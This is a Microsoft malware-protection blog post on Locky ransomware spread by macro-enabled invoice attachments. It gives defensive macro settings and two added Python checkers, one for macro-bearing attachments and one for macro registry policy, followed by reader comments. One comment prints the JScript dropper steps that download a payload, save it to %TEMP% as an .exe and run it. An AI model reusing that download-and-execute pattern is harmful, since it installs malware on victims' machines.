Locky malware, lucky to avoid it


You may have seen reports of the Locky malware circulating the web; we think this is a good time to discuss its distribution methods, and reiterate some best-practice methods that will help prevent infection.

We’ve seen Locky being distributed by spam email. This is not in itself a unique distribution method, but it means that its spread is broad and not isolated to any particular region. This ransomware knows no borders, and we’ve seen high infection rates across the world.
The Locky email attachment usually arrives as a Word document (it could also be an Excel document) that appears to be an invoice. We’ve also seen the following downloaders distribute Ransom:Win32/Locky.A:

If you open this file and allow the macro to run, the malware is downloaded and runs on your PC, encrypting your files. A ransom message is then displayed demanding payment in order to unlock your encrypted files. Note that once your files are encrypted, the only guaranteed way to restore them is from backup. Microsoft does not recommend you pay the ransom; there is no guarantee that this will give you access to your files.
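The attachment carrier described above, as an added example that is not part of the original post: a Python triage routine that flags Office attachments containing a VBA project by looking at the container structure rather than the file extension. The sample documents are constructed in the code; the OOXML content type and the `_VBA_PROJECT` stream name come from the Office file formats, and the check for the legacy binary format is a heuristic.

```python
# Added example, not from the MMPC post: triage mail attachments for embedded VBA macros.
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML .docx/.docm/.xlsm container
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"

def ooxml_has_vba(data: bytes) -> bool:
    """OOXML: a macro project is a vbaProject.bin part declared in [Content_Types].xml."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return True
            return ("[Content_Types].xml" in names
                    and VBA_CONTENT_TYPE in zf.read("[Content_Types].xml"))
    except zipfile.BadZipFile:
        return False

def has_vba_macros(data: bytes) -> bool:
    """Decide by container magic, never by extension: a renamed .docm still opens with macros."""
    if data.startswith(ZIP_MAGIC):
        return ooxml_has_vba(data)
    if data.startswith(OLE_MAGIC):
        # Legacy OLE2: every VBA project contains a stream named _VBA_PROJECT, and OLE directory
        # entry names are UTF-16LE. Triage heuristic; a full OLE directory parse is more robust.
        return "_VBA_PROJECT".encode("utf-16-le") in data
    return False

def build_sample_docm(with_macro: bool) -> bytes:
    """Constructed minimal OOXML document for the demo (not a real malware sample)."""
    types = ['<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
             '<Override PartName="/word/document.xml" ContentType="application/xml"/>']
    if with_macro:
        types.append('<Override PartName="/word/vbaProject.bin" '
                     'ContentType="application/vnd.ms-office.vbaProject"/>')
    types.append("</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "".join(types))
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 32)  # placeholder bytes, not real VBA
    return buf.getvalue()

def triage(attachments: dict) -> list:
    """Names of attachments that carry macros and should be held for review."""
    return sorted(name for name, data in attachments.items() if has_vba_macros(data))
```

A gateway that holds back everything `triage()` returns stops the macro-laden "invoice" before a user ever sees the Enable Content bar.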

While Microsoft detects and removes Locky, we recommend you disable macros to help prevent this and other macro-downloaded threats from infecting your PC, and then only enable macros that you trust, on a case-by-case basis. To help keep your enterprise secure, consider using a trusted location for files in your enterprise; documents that require macros can then be stored there. You can also use our cloud protection services to help boost your protection; this and other advice on how to help keep your PC protected is outlined below.


Disable all except digitally signed macros in Microsoft Word

To help prevent malicious files from running macros that might download malware automatically, we recommend you change your settings to disable all except digitally signed macros.

To do this:

1. Open a Microsoft Word document.
2. Click the File tab.
3. Click Options.
4. In the Trust Center, click Trust Center Settings.

Trust Center settings

5. Select Disable all macros except digitally signed macros.

Macro settings in Trust Center

6. Click OK.


Block macros from running in Office files from the Internet in your enterprise

Office 16 provides a Group Policy setting that enables you to block macros from running in Word, Excel and PowerPoint files from the Internet. Read about how to block macros from running in Office 16 files from the Internet.
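To verify that the Trust Center setting from the previous section and the Group Policy setting from this one are actually in force, here is an added example (not code from the post or from Microsoft): the registry paths, the `VBAWarnings` value meanings and the `blockcontentexecutionfrominternet` value name are this example's assumptions for Office 2016 (version key 16.0). `evaluate()` works on any platform from a snapshot; `read_snapshot()` reads the live keys on Windows.

```python
# Added example, not from the MMPC post: audit whether the macro settings recommended
# above are in force for Word, Excel and PowerPoint. The registry paths, the
# VBAWarnings meanings and the blockcontentexecutionfrominternet value name are this
# example's assumptions for Office 2016 (version key 16.0).
OFFICE_APPS = ("word", "excel", "powerpoint")
POLICY_KEY = r"Software\Policies\Microsoft\Office\16.0\{app}\Security"  # HKCU, written by Group Policy
USER_KEY = r"Software\Microsoft\Office\16.0\{app}\Security"             # HKCU, written by the Trust Center UI
# VBAWarnings: 1 = enable all, 2 = disable with notification (the Enable Content bar),
# 3 = disable all except digitally signed, 4 = disable all without notification.
SIGNED_ONLY, DISABLE_ALL = 3, 4
BLOCK_INTERNET = "blockcontentexecutionfrominternet"  # the "files from the Internet" setting, 1 = block

def evaluate(snapshot: dict) -> list:
    """snapshot maps app -> {"policy": values or None, "user": values or None}.
    Returns a list of findings; an empty list means the recommended settings are enforced."""
    findings = []
    for app in OFFICE_APPS:
        entry = snapshot.get(app) or {}
        policy, user = entry.get("policy") or {}, entry.get("user") or {}
        effective = {**user, **policy}  # a policy value overrides the user's own Trust Center choice
        warn = effective.get("VBAWarnings")
        if warn not in (SIGNED_ONLY, DISABLE_ALL):
            findings.append(f"{app}: VBAWarnings={warn!r}; expected {SIGNED_ONLY} (signed only) or {DISABLE_ALL}")
        elif "VBAWarnings" not in policy:
            findings.append(f"{app}: VBAWarnings is only a user choice, not enforced by policy")
        if policy.get(BLOCK_INTERNET) != 1:
            findings.append(f"{app}: macros in files from the Internet are not blocked ({BLOCK_INTERNET} != 1)")
    return findings

def read_snapshot() -> dict:
    """Windows only: read both key sets from HKCU for each app; a missing key reads as None."""
    import winreg  # imported here so evaluate() stays importable on any platform

    def read_values(path):
        try:
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path)
        except FileNotFoundError:
            return None
        with key:
            values = {}
            for i in range(winreg.QueryInfoKey(key)[1]):  # [1] is the number of values
                name, data, _ = winreg.EnumValue(key, i)
                values[name] = data
            return values

    return {app: {"policy": read_values(POLICY_KEY.format(app=app)),
                  "user": read_values(USER_KEY.format(app=app))} for app in OFFICE_APPS}
```

A setting chosen only in the Trust Center UI is reported as unenforced, since a user (or a document's instructions) can switch it back; the policy key is what a GPO-based rollout should populate.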


Only enable trusted content

If you have disabled macros, when you open a file that has macros you’ll see a message bar similar to the following:

Enable macro message

Only click Enable Content if you trust the file, that is, you know where it’s from and are certain that running the macro is harmless.


Use advanced threat and cloud protection

You can boost your protection by using Office 365 Advanced Threat Protection and also enabling Microsoft Active Protection Service (MAPS).

Office 365 helps by blocking dangerous email threats; see the Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.

MAPS uses cloud protection to help guard against the latest malware threats. You should check if MAPS is enabled on your PC.


Help prevent malware infections on your PC

There are a number of other things you can do to help prevent malware infections, for example:


So to wrap this up: this ransomware is bad, but infection is preventable! Microsoft detects and removes this threat, but by ensuring that you only run known, trusted macros, you’ll help prevent a Locky infection – and any other malware that relies on malicious macros. Generally, a good approach is to only allow digitally signed macros that you trust to run on any of your documents.

Stay safe, from all of us at the MMPC.

-Jasmine Sesso, MMPC

Comments (26)

  1. Ryan Steele says:

    This is good advice, but you may want to clarify that when you select the “Disable all macros except digitally signed macros” option, users can still enable them on a per-document basis by clicking the “Enable Content” button. In the examples we have seen, the text of the malicious document explicitly instructs the user to do just that, so this is not a very effective mitigation strategy.

    If possible, I recommend creating a group policy to enforce the “Disable all macros without notification” setting for all users. If some staff do use macros, you can create a security group in AD with “Deny” rights on the GPO and add users as needed (after training them to avoid the malicious attachments, of course).

  2. Adwbust says:

    Not to mention, got a doc file from spam and MSE doesn’t detect it.

    Release an office update that auto blocks all unsigned macros from running and send samples to MAPS cloud when user chose to run an unsigned macro. But I’d rather you remove that run option from notification!

    1. Adwbust says:

      MD5 is “d21efde4714e11fa061363c73dd9ff65”
      Is this a macro dropper? MSE doesn’t detect it!

  3. As usual you missed the first line of defense which prevents Locky (or any other unwanted program) from running, independent of the way of intrusion: APPLICATION WHITELISTING.
    Since Windows XP this can be enabled on ALL editions of Windows (including Home, Embedded and Starter) via Software Restriction Policies: see http://home.arcor.de/skanthak/SAFER.html

    Cf. https://technet.microsoft.com/en-us/library/cc740025.aspx too!

    1. Mark Payton says:

      @Stefan Kanthak,

      Have you had success using this with Office 2016 installed via click-to-run (in my experience, one of the poorer decisions Microsoft has ever made)? I am early in the process of setting up an SRP but it appears that many of the DLLs for O2016 run from AppData when installed this way. As this is a read/write directory this is NOT a good thing.

      1. Running applications from %APPDATA% or another user-writeable directory is a COMPLETELY BRAINDEAD idea … and of course COMPLETELY BROKEN design.
        If you still want to run crapware which installs to %APPDATA%: if the executables are digitally signed create a SAFER certificate rule. If they are not signed: sign them with your certificate and create a SAFER certificate rule.

        1. wadeface says:

          The person you are replying to was discussing how Office including 2016 extracts to and runs parts of its installation from AppData.

      2. Michel Christaller says:

        We do use both SRP (Win7) and AppLocker (Win10) and they work perfectly with Click-to-Run instances of Office 365. We deploy Office using the setup.exe as administrator so Office files are not in the user’s AppData folder.

  4. Susan says:

    SRP has a lot of overhead though and Device Guard (Win10’s app whitelisting solution) is only for Enterprise skus. You may need to look at third party solutions. One I’m looking at is http://alpha.whitecloudsecurity.com/protect-your-company

    1. The overhead of SAFER is barely noticeable.
      I’ve set up some thousands of PCs where SAFER is activated during setup (before the first user can log in) during the last 12 years and can’t tell any difference.
      Anti-virus needs way more resources.

  5. x41 says:

    You also should use a proxy. If Locky can’t access a C&C server, it won’t get an encryption key and therefore does no harm to your files.
    At least, not yet.

  6. Kelly Powers says:

    It would be helpful if Office 365 would allow customers to block\quarantine attachments which have macros. Most mail gateways and firewalls on the market allow the option to block\quarantine incoming attachments with macros. Office 365 does not have this option. This is an oversight which is actively placing O365 customers in danger. Clients have had Locky end up in their inbox repeatedly as O365 has struggled to keep up with the variants. When will MS allow the blocking\quarantine action within O365? This alone would offer another reasonable and obvious layer of protection, and has been something O365 customers have been requesting for months as cryptoware continues to spread through this attack vector. In the meantime, for customers who wish to stick with O365, perhaps the only solution would be to create mail flow rules to basically loop through an on-premises mail relay which will perform this function since O365 cannot, which isn’t ideal for small businesses. Or Microsoft, really. If we want customers to be in the cloud, then we have to provide what the rest of the industry provides for macro virus mail protection. This option is very basic, widespread through the industry, and there is no valid reason why this has not already been deployed to O365 customers. Make it happen.

  7. Eoin Ryan says:

    One great response from Microsoft (given the explosive growth in O365) might be to add the Office 365 Advanced Threat Protection as a free add-in to ALL O365 subscriptions.

  8. ed roberts says:

    Got infected with locket, half programs gone. Talk about stressed wow

    1. ed roberts says:

      Should read lockey

  9. Jim says:

    I clicked on this link and got a German language page. NO HELP.
    https://technet.microsoft.com/DE-DE/library/ee857085%28v=office.16%29.aspx#blockvba

  10. Nikola Kosić says:

    Hi,

    After >20 years Office provides limited to no options on macros. So we have the option to run or not run macros.

    I wrote macros for simple usage, and they are used by low experience users..

    And MS has no intention of adding any option that is really useful; instead we are using stupid hack solutions like disabling all macros and “training” users.

    Big thumb down for this..

    Regards, Nikola.

    1. ASB says:

      You can also sign your macros, and disable any macros that are not signed.

  11. Okmonica says:

    But how do I un-encrypt (de-encrypt?) all of the files that were encrypted by the ransomware??? I can’t find this anywhere online. Any file (for example, every Word doc, Excel doc, music file, picture, etc.) has an additional extension at the end called “.crypt”. At one point while my computer was being scanned I was able to open my pictures, but now, several hours later, all of the pictures and videos have the same encryption extension that the Word documents had.

    I downloaded the virus by pressing ok to what appeared to be a legitimate (even had a Microsoft Certificate!) notification to update “Microsoft Activation Technologies.” It was not a word document or email attachment as I’ve seen described on this site.

    Note that I used Windows Defender and the online Microsoft Safety Scanner (as of 4/20/16, when I downloaded the virus) to do a full scan and they said the computer is clean. I have not restarted the computer yet out of fear it would make things worse.

    Any advice on what to do to recover my files (outside of the obvious: delete it all and then restore from a backup) is needed.

    some related questions:
    1. Am I in danger of infecting my computer more if I try to rename the files by removing the “.crypt” extension manually? And would this even work to recover each file?
    2. If I tried to do a “system restore” back to a recent date, rather than going from an external hard drive, would it even work, would it cause more problems, or will I have my files back?

    1. Pete says:

      Unfortunately changing the file extensions won’t get your files back. The only way to recover them is from backup, or pay the ransom.

  12. martin marlborough says:

    Lost all my files to this virus. Lots of work down the drain.

  13. Domas says:

    The malware was executed by opening a .js file in updated Windows 7. The payload was downloaded using ActiveXObject.MSXML2.XMLHTTP and then executed as follows:
    var file_path = ActiveXObject.WScript.Shell.ExpandEnvironmentStrings(“%TEMP%”) + “/GLtKojHUYhT.exe”;
    ActiveXObject.ADODB.Stream.open();
    ActiveXObject.ADODB.Stream.type = 1;
    ActiveXObject.ADODB.Stream.write(ActiveXObject.MSXML2.XMLHTTP.ResponseBody);
    ActiveXObject.ADODB.Stream.saveToFile(file_path, 2);
    ActiveXObject.ADODB.Stream.position = 0;
    ActiveXObject.ADODB.Stream.close();
    ActiveXObject.WScript.Shell.Run(file_path, 1, false)

    The payload was downloaded from a Brazilian domain.

    1. 486DX50 says:

      What version of IE do you use?

  14. Linda says:

    Well, Microsoft certainly didn’t detect or remove it from my computer. I ran the Defender scan and it came up with nothing. Even ran Spybot and it came up with nothing. What now????

  15. san says:

    question is: can ransomware encrypt an already encrypted file that was encrypted by BitLocker?
    What is preventing ransomware from putting another layer of encryption on top of BitLocker or any other cryptosystem that encrypts files for users to provide more privacy?
